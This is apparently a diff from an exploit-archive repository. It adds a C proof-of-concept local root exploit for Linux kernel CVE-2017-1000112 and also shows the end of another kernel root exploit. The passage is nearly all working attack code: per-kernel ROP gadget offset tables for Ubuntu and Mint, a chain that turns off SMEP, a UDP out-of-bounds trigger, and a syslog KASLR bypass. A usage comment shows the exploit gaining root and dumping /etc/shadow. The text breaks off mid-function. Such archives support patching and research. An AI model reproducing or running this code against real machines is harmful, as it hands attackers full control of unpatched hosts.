+	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
+		dprintf("[-] write_file(/proc/self/gid_map)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	cpu_set_t my_set;
+	CPU_ZERO(&my_set);
+	CPU_SET(0, &my_set);
+	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
+		dprintf("[-] sched_setaffinity()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (system("/sbin/ifconfig lo up") != 0) {
+		dprintf("[-] system(/sbin/ifconfig lo up)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+int main(int argc, char *argv[]) {
+	if (argc > 1) SHELL = argv[1];
+
+	dprintf("[.] starting\n");
+
+	check_procs();
+
+	dprintf("[.] checking kernel version\n");
+	detect_versions();
+	dprintf("[~] done, version looks good\n");
+
+	dprintf("[.] checking SMEP and SMAP\n");
+	check_smep_smap();
+	dprintf("[~] done, looks good\n");
+
+	dprintf("[.] setting up namespace sandbox\n");
+	setup_sandbox();
+	dprintf("[~] done, namespace sandbox set up\n");
+
+#if ENABLE_KASLR_BYPASS
+	dprintf("[.] KASLR bypass enabled, getting kernel addr\n");
+	KERNEL_BASE = get_kernel_addr();
+	dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+	dprintf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
+	dprintf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
+
+#if ENABLE_SMEP_SMAP_BYPASS
+	dprintf("[.] native_write_cr4:    %lx\n", NATIVE_WRITE_CR4);
+#endif
+
+	dprintf("[.] padding heap\n");
+	kmalloc_pad(KMALLOC_PAD);
+	pagealloc_pad(PAGEALLOC_PAD);
+	dprintf("[.] done, heap is padded\n");
+
+#if ENABLE_SMEP_SMAP_BYPASS
+	dprintf("[.] SMEP & SMAP bypass enabled, turning them off\n");
+	oob_timer_execute((void *)(NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
+	dprintf("[.] done, SMEP & SMAP should be off now\n");
+#endif
+
+	dprintf("[.] executing get root payload %p\n", &get_root_payload);
+	oob_id_match_execute((void *)&get_root_payload);
+	dprintf("[.] done, should be root now\n");
+
+	check_root();
+
+	while (1) sleep(1000);
+
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/local/47169.c b/exploits/linux/local/47169.c
new file mode 100644
index 000000000..25d191c3a
--- /dev/null
+++ b/exploits/linux/local/47169.c
@@ -0,0 +1,884 @@
+// A proof-of-concept local root exploit for CVE-2017-1000112.
+// Includes KASLR and SMEP bypasses. No SMAP bypass.
+// Tested on:
+// - Ubuntu trusty 4.4.0 kernels
+// - Ubuntu xenial 4.4.0 and 4.8.0 kernels
+// - Linux Mint rosa 4.4.0 kernels
+// - Linux Mint sarah 4.8.0 kernels
+// - Zorin OS 12.1 4.4.0-39 kernel
+//
+// Usage:
+// user@ubuntu:~$ uname -a
+// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+// user@ubuntu:~$ whoami
+// user
+// user@ubuntu:~$ id
+// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
+// user@ubuntu:~$ gcc pwn.c -o pwn
+// user@ubuntu:~$ ./pwn 
+// [.] starting
+// [.] checking kernel version
+// [.] kernel version '4.8.0-58-generic' detected
+// [~] done, version looks good
+// [.] checking SMEP and SMAP
+// [~] done, looks good
+// [.] setting up namespace sandbox
+// [~] done, namespace sandbox set up
+// [.] KASLR bypass enabled, getting kernel addr
+// [~] done, kernel text:   ffffffffae400000
+// [.] commit_creds:        ffffffffae4a5d20
+// [.] prepare_kernel_cred: ffffffffae4a6110
+// [.] SMEP bypass enabled, mmapping fake stack
+// [~] done, fake stack mmapped
+// [.] executing payload ffffffffae40008d
+// [~] done, should be root now
+// [.] checking if we got root
+// [+] got r00t ^_^
+// root@ubuntu:/home/user# whoami
+// root
+// root@ubuntu:/home/user# id
+// uid=0(root) gid=0(root) groups=0(root)
+// root@ubuntu:/home/user# cat /etc/shadow
+// root:!:17246:0:99999:7:::
+// daemon:*:17212:0:99999:7:::
+// bin:*:17212:0:99999:7:::
+// sys:*:17212:0:99999:7:::
+// ...
+//
+// Andrey Konovalov <andreyknvl@gmail.com>
+// ---
+// Updated by <bcoles@gmail.com>
+// - support for distros based on Ubuntu kernel
+// - additional kernel targets
+// - additional KASLR bypasses
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-1000112
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <sched.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <linux/socket.h>
+#include <netinet/ip.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#	define dprintf printf
+#else
+#	define dprintf
+#endif
+
+#define ENABLE_KASLR_BYPASS		1
+#define ENABLE_SMEP_BYPASS		1
+
+char* SHELL = "/bin/bash";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
+unsigned long KERNEL_BASE =		0xffffffff81000000ul;
+
+// Will be overwritten by detect_kernel().
+int kernel = -1;
+
+struct kernel_info {
+	const char* distro;
+	const char* version;
+	uint64_t commit_creds;
+	uint64_t prepare_kernel_cred;
+	uint64_t xchg_eax_esp_ret;
+	uint64_t pop_rdi_ret;
+	uint64_t mov_dword_ptr_rdi_eax_ret;
+	uint64_t mov_rax_cr4_ret;
+	uint64_t neg_rax_ret;
+	uint64_t pop_rcx_ret;
+	uint64_t or_rax_rcx_ret;
+	uint64_t xchg_eax_edi_ret;
+	uint64_t mov_cr4_rdi_ret;
+	uint64_t jmp_rcx;
+};
+
+struct kernel_info kernels[] = {
+	{ "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
+	{ "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
+	{ "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
+	{ "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
+	{ "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
+	{ "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
+	{ "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
+	{ "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
+	{ "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
+	{ "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
+	{ "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
+	{ "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
+	{ "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
+	{ "trusty", "4.4.0-87-generic", 0x9ec20, 0x9ef00, 0x8a, 0x253b93, 0x109a17, 0x1a840, 0x3e7cda, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
+	{ "trusty", "4.4.0-89-generic", 0x9ec30, 0x9ef10, 0x8a, 0x3ec5cF, 0x109a27, 0x1a830, 0x3e7fba, 0x1cc7c, 0x77523, 0x49d1d, 0x62360, 0x1a77b },
+	{ "xenial", "4.4.0-81-generic", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },
+	{ "xenial", "4.4.0-89-generic", 0xa28a0, 0xa2c90, 0x8a, 0x33e60d, 0x112777, 0x1b9b0, 0x403a1a, 0x1de5c, 0x7a483, 0x1084e5, 0x645b0, 0x3083d },
+	{ "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
+	{ "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
+	{ "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
+	// { "xenial", "4.8.0-42-generic", 0xa5cf0, 0xa60e0, 0x8d, 0x4149ad, 0x1191f7, 0x1b170, 0x439d7a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df1b },
+	// { "xenial", "4.8.0-44-generic", 0xa5cf0, 0xa60e0, 0x8d, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0xb2df17 },
+	{ "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-51-generic", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-53-generic", 0xa5d00, 0xa60f0, 0x8d, 0x301f2d, 0x119207, 0x01b170, 0x43a0da, 0x63e843, 0x07bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
+	{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
+};
+
+// Used to get root privileges.
+#define COMMIT_CREDS			(KERNEL_BASE + kernels[kernel].commit_creds)
+#define PREPARE_KERNEL_CRED		(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
+
+// Used when ENABLE_SMEP_BYPASS is used.
+// - xchg eax, esp ; ret
+// - pop rdi ; ret
+// - mov dword ptr [rdi], eax ; ret
+// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
+// - neg rax ; ret
+// - pop rcx ; ret 
+// - or rax, rcx ; ret
+// - xchg eax, edi ; ret
+// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
+// - jmp rcx
+#define XCHG_EAX_ESP_RET		(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
+#define POP_RDI_RET			(KERNEL_BASE + kernels[kernel].pop_rdi_ret)
+#define MOV_DWORD_PTR_RDI_EAX_RET	(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
+#define MOV_RAX_CR4_RET			(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
+#define NEG_RAX_RET			(KERNEL_BASE + kernels[kernel].neg_rax_ret)
+#define POP_RCX_RET			(KERNEL_BASE + kernels[kernel].pop_rcx_ret)
+#define OR_RAX_RCX_RET			(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
+#define XCHG_EAX_EDI_RET		(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
+#define MOV_CR4_RDI_RET			(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
+#define JMP_RCX				(KERNEL_BASE + kernels[kernel].jmp_rcx)
+
+// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
+
+typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
+
+void get_root(void) {
+	((_commit_creds)(COMMIT_CREDS))(
+	    ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
+}
+
+// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
+
+uint64_t saved_esp;
+
+// Unfortunately GCC does not support `__atribute__((naked))` on x86, which
+// can be used to omit a function's prologue, so I had to use this weird
+// wrapper hack as a workaround. Note: Clang does support it, which means it
+// has better support of GCC attributes than GCC itself. Funny.
+void wrapper() {
+	asm volatile ("					\n\
+	payload:					\n\
+		movq %%rbp, %%rax			\n\
+		movq $0xffffffff00000000, %%rdx		\n\
+		andq %%rdx, %%rax			\n\
+		movq %0, %%rdx				\n\
+		addq %%rdx, %%rax			\n\
+		movq %%rax, %%rsp			\n\
+		call get_root				\n\
+		ret					\n\
+	" : : "m"(saved_esp) : );
+}
+
+void payload();
+
+#define CHAIN_SAVE_ESP				\
+	*stack++ = POP_RDI_RET;			\
+	*stack++ = (uint64_t)&saved_esp;	\
+	*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
+
+#define SMEP_MASK 0x100000
+
+#define CHAIN_DISABLE_SMEP			\
+	*stack++ = MOV_RAX_CR4_RET;		\
+	*stack++ = NEG_RAX_RET;			\
+	*stack++ = POP_RCX_RET;			\
+	*stack++ = SMEP_MASK;			\
+	*stack++ = OR_RAX_RCX_RET;		\
+	*stack++ = NEG_RAX_RET;			\
+	*stack++ = XCHG_EAX_EDI_RET;		\
+	*stack++ = MOV_CR4_RDI_RET;
+
+#define CHAIN_JMP_PAYLOAD                     \
+	*stack++ = POP_RCX_RET;               \
+	*stack++ = (uint64_t)&payload;        \
+	*stack++ = JMP_RCX;
+
+void mmap_stack() {
+	uint64_t stack_aligned, stack_addr;
+	int page_size, stack_size, stack_offset;
+	uint64_t* stack;
+
+	page_size = getpagesize();
+
+	stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
+	stack_addr = stack_aligned - page_size * 4;
+	stack_size = page_size * 8;
+	stack_offset = XCHG_EAX_ESP_RET % page_size;
+
+	stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
+			MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
+	if (stack == MAP_FAILED || stack != (void*)stack_addr) {
+		dprintf("[-] mmap()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	stack = (uint64_t*)((char*)stack_aligned + stack_offset);
+
+	CHAIN_SAVE_ESP;
+	CHAIN_DISABLE_SMEP;
+	CHAIN_JMP_PAYLOAD;
+}
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+struct ubuf_info {
+	uint64_t callback;	// void (*callback)(struct ubuf_info *, bool)
+	uint64_t ctx;		// void *
+	uint64_t desc;		// unsigned long
+};
+
+struct skb_shared_info {
+	uint8_t nr_frags;	// unsigned char
+	uint8_t tx_flags;	// __u8
+	uint16_t gso_size;	// unsigned short
+	uint16_t gso_segs;	// unsigned short
+	uint16_t gso_type;	// unsigned short
+	uint64_t frag_list;	// struct sk_buff *
+	uint64_t hwtstamps;	// struct skb_shared_hwtstamps
+	uint32_t tskey;		// u32
+	uint32_t ip6_frag_id;	// __be32
+	uint32_t dataref;	// atomic_t
+	uint64_t destructor_arg; // void *
+	uint8_t frags[16][17];	// skb_frag_t frags[MAX_SKB_FRAGS];
+};
+
+struct ubuf_info ui;
+
+void init_skb_buffer(char* buffer, unsigned long func) {
+	struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
+	memset(ssi, 0, sizeof(*ssi));
+
+	ssi->tx_flags = 0xff;
+	ssi->destructor_arg = (uint64_t)&ui;
+	ssi->nr_frags = 0;
+	ssi->frag_list = 0;
+
+	ui.callback = func;
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+#define SHINFO_OFFSET 3164
+
+void oob_execute(unsigned long payload) {
+	char buffer[4096];
+	memset(&buffer[0], 0x42, 4096);
+	init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
+
+	int s = socket(PF_INET, SOCK_DGRAM, 0);
+	if (s == -1) {
+		dprintf("[-] socket()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	struct sockaddr_in addr;
+	memset(&addr, 0, sizeof(addr));
+	addr.sin_family = AF_INET;
+	addr.sin_port = htons(8000);
+	addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+	if (connect(s, (void*)&addr, sizeof(addr))) {
+		dprintf("[-] connect()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
+	int rv = send(s, buffer, size, MSG_MORE);
+	if (rv != size) {
+		dprintf("[-] send()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	int val = 1;
+	rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
+	if (rv != 0) {
+		dprintf("[-] setsockopt(SO_NO_CHECK)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	send(s, buffer, 1, 0);
+
+	close(s);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+	int f = open(file, O_RDONLY);
+	if (f == -1)
+		return -1;
+	int bytes_read = 0;
+	while (true) {
+		int bytes_to_read = CHUNK_SIZE;
+		if (bytes_to_read > max_length - bytes_read)
+			bytes_to_read = max_length - bytes_read;
+		int rv = read(f, &buffer[bytes_read], bytes_to_read);
+		if (rv == -1)
+			return -1;
+		bytes_read += rv;
+		if (rv == 0)
+			return bytes_read;
+	}
+}
+
+#define LSB_RELEASE_LENGTH 1024
+
+void get_distro_codename(char* output, int max_length) {
+	char buffer[LSB_RELEASE_LENGTH];
+	char* path = "/etc/lsb-release";
+	int length = read_file(path, &buffer[0], LSB_RELEASE_LENGTH);
+	if (length == -1) {
+               dprintf("[-] open/read(%s)\n", path);
+               exit(EXIT_FAILURE);
+	}
+	const char *needle = "DISTRIB_CODENAME=";
+	int needle_length = strlen(needle);
+	char* found = memmem(&buffer[0], length, needle, needle_length);
+	if (found == NULL) {
+		dprintf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
+		exit(EXIT_FAILURE);
+	}
+	int i;
+	for (i = 0; found[needle_length + i] != '\n'; i++) {
+		if (i >= max_length) {
+			exit(EXIT_FAILURE);
+		}
+		if ((found - &buffer[0]) + needle_length + i >= length) {
+			exit(EXIT_FAILURE);
+		}
+		output[i] = found[needle_length + i];
+	}
+}
+
+struct utsname get_kernel_version() {
+	struct utsname u;
+	int rv = uname(&u);
+	if (rv != 0) {
+		dprintf("[-] uname()\n");
+		exit(EXIT_FAILURE);
+	}
+	return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+#define DISTRO_CODENAME_LENGTH 32
+
+void detect_kernel() {
+	char codename[DISTRO_CODENAME_LENGTH];
+	struct utsname u;
+
+	u = get_kernel_version();
+
+	if (strstr(u.machine, "64") == NULL) {
+		dprintf("[-] system is not using a 64-bit kernel\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (strstr(u.version, "-Ubuntu") == NULL) {
+		dprintf("[-] system is not using an Ubuntu kernel\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (strstr(u.version, "14.04.1")) {
+		strcpy(&codename[0], "trusty");
+	} else if (strstr(u.version, "16.04.1")) {
+		strcpy(&codename[0], "xenial");
+	} else {
+		get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);
+
+		// Linux Mint kernel release mappings
+		if (!strcmp(&codename[0], "qiana"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "rebecca"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "rafaela"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "rosa"))
+			strcpy(&codename[0], "trusty");
+		if (!strcmp(&codename[0], "sarah"))
+			strcpy(&codename[0], "xenial");
+		if (!strcmp(&codename[0], "serena"))
+			strcpy(&codename[0], "xenial");
+		if (!strcmp(&codename[0], "sonya"))
+			strcpy(&codename[0], "xenial");
+	}
+
+	int i;
+	for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+		if (strcmp(&codename[0], kernels[i].distro) == 0 &&
+		    strcmp(u.release, kernels[i].version) == 0) {
+			dprintf("[.] kernel version '%s' detected\n", kernels[i].version);
+			kernel = i;
+			return;
+		}
+	}
+
+	dprintf("[-] kernel version not recognized\n");
+	exit(EXIT_FAILURE);
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
+int smap_smep_enabled() {
+	char buffer[PROC_CPUINFO_LENGTH];
+	char* path = "/proc/cpuinfo";
+	int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+	if (length == -1) {
+		dprintf("[-] open/read(%s)\n", path);
+		exit(EXIT_FAILURE);
+	}
+	int rv = 0;
+	char* found = memmem(&buffer[0], length, "smep", 4);
+	if (found != NULL)
+		rv += 1;
+	found = memmem(&buffer[0], length, "smap", 4);
+	if (found != NULL)
+		rv += 2;
+	return rv;
+}
+
+void check_smep_smap() {
+	int rv = smap_smep_enabled();
+	if (rv >= 2) {
+		dprintf("[-] SMAP detected, no bypass available\n");
+		exit(EXIT_FAILURE);
+	}
+#if !ENABLE_SMEP_BYPASS
+	if (rv >= 1) {
+		dprintf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n");
+		exit(EXIT_FAILURE);
+	}
+#endif
+}
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+bool mmap_syslog(char** buffer, int* size) {
+	*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+	if (*size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+		return false;
+	}
+
+	*size = (*size / getpagesize() + 1) * getpagesize();
+	*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
+				   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+	*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+	if (*size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+		return false;
+	}
+
+	return true;
+}
+
+unsigned long get_kernel_addr_trusty(char* buffer, int size) {
+	const char* needle1 = "Freeing unused";
+	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+	if (substr == NULL) return 0;
+
+	int start = 0;
+	int end = 0;
+	for (end = start; substr[end] != '-'; end++);
+
+	const char* needle2 = "ffffff";
+	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+	if (substr == NULL) return 0;
+
+	char* endptr = &substr[16];
+	unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+	r &= 0xffffffffff000000ul;
+
+	return r;
+}
+
+unsigned long get_kernel_addr_xenial(char* buffer, int size) {
+	const char* needle1 = "Freeing unused";
+	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
